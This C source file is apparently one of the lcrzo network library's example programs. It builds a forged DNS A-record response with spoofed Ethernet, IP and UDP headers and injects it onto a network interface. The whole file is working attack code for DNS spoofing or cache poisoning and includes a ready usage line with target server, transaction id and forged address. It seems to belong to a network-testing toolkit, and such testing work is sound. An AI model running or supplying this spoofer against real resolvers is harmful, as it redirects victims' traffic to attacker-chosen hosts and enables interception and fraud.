
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000330=
{ /*reference*/     "lcrzoex", 330,
  /*version*/       1, 0,
  /*title*/         "{ETH,IP,UDP} spoof of a DNS response for a A",
  /*french title*/  "spoof {ETH,IP,UDP} d'une reponse DNS pour un A",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device src_eth dst_eth ip_source_address dnsserver dst_port id ttl hostname hostnameip authns authnsip",
  /*french usage*/  "device eth_src eth_dst adresse_ip_source serveurdns port_dst id ttl hostname hostnameip authns authnsip",
  /*usage example*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.4 5.6.7.8 1234 45334 60 www.s.com 192.1.1.1 ns.s.com 192.1.1.2",
  /*fr. usage ex.*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.4 5.6.7.8 1234 45334 60 www.s.com 192.1.1.1 ns.s.com 192.1.1.2", 
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000330_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000330_main(int argc, char *argv[])
{ lcrzo_spoof spoof;
  lcrzo_device device;
  lcrzo_hdrleth hdrleth;
  lcrzo_hdrlip hdrlip;
  lcrzo_hdrludp hdrludp;
  lcrzo_ipl hsip, authnsip;
  lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_uint32 ttl;
  lcrzo_uint16 id;

  lcrzo_init();
  if ( argc<13 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000330, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));

  /* initialize Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdrleth));
  lcrzo_epr(shared_para_etha_init_src(argv[2], hdrleth.src));
  lcrzo_epr(shared_para_etha_init_dst(argv[3], hdrleth.dst));

  /* initialize IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&hdrlip));
  lcrzo_epr(shared_para_ipl_init_src(argv[4], &(hdrlip.saddr)));
  lcrzo_epr(shared_para_ipl_init_dst(argv[5], &(hdrlip.daddr)));

  /* initialize UDP header */
  lcrzo_epr(lcrzo_hdrludp_initdefault(&hdrludp));
  hdrludp.sport=53;
  lcrzo_epr(shared_para_port_init_dst(argv[6], 0, &hdrludp.dport));
 
  /* create the packet */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[10], &hsip));
  lcrzo_epr(lcrzo_ipl_init_hs(argv[12], &authnsip));
  lcrzo_epr(lcrzo_uint16_init_text(argv[7], &id));
  lcrzo_epr(lcrzo_uint32_init_text(argv[8], &ttl));
  lcrzo_epr(shared_dns_packet_resp_a_initm(id, ttl,
					   argv[9], hsip, argv[11], authnsip,
					   &data, &datasize));

  /* spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_ethipoptudpdata(&spoof, device, hdrleth, 
					hdrlip, NULL, 0,
					hdrludp, 
					data, (lcrzo_uint16)datasize));
  lcrzo_epr(lcrzo_spoof_close(&spoof));

  /* free */
  lcrzo_epr(lcrzo_data_free2(&data));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}





